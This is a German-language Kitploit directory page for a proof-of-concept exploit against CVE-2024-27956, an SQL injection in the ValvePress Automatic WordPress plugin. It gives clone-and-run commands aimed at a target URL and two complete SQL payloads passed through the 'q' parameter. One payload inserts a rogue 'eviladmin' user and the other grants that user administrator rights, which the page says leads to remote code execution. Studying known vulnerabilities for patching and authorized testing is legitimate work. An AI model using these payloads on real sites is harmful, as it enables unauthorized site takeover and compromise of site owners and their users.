Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-27956-RCE — Proof-of-concept-Exploit für CVE-2024-27956, eine SQL-Injection im ValvePress Automatic WordPress-Plugin. Erstellt einen Admin-Benutzer und ermöglicht Remote-Code-Ausführung über nicht bereinigte Eingaben. | Kitploit
Tools/GitHubGitHub/cve-2024/cve-2024-27956-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubcve-2024/cve-2024-27956-rce

CVE-2024-27956-RCE

Proof-of-concept-Exploit für CVE-2024-27956, eine SQL-Injection im ValvePress Automatic WordPress-Plugin. Erstellt einen Admin-Benutzer und ermöglicht Remote-Code-Ausführung über nicht bereinigte Eingaben.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-27956-RCE

Ein PoC für CVE-2024-27956, eine SQL-Injection im ValvePress Automatic Plugin. Dieser PoC nutzt die Schwachstelle aus, indem er einen Benutzer auf dem Zielsystem erstellt und diesem Administratorrechte verleiht. Als Administrator in WordPress kann man Remote Code Execution erreichen.

Verwendung

root@kitploit:~
git clone https://github.com/diego-tella/CVE-2024-27956-RCE/
cd CVE-2024-27956-RCE
python exploit.py http://target.com

Payloads

SQL-Injection-Payload zum Erstellen eines Benutzers:
root@kitploit:~
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin', '$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', '[email protected]', 'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')

Administratorrechte vergeben:

root@kitploit:~
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}

Im q-Parameter können wir unsere gesamte Query übergeben, die dann ausgeführt wird.

image Die Benutzereingabe wird direkt ohne jegliche Einschränkung oder Bereinigung ausgeführt.

PoC

Tool herunterladen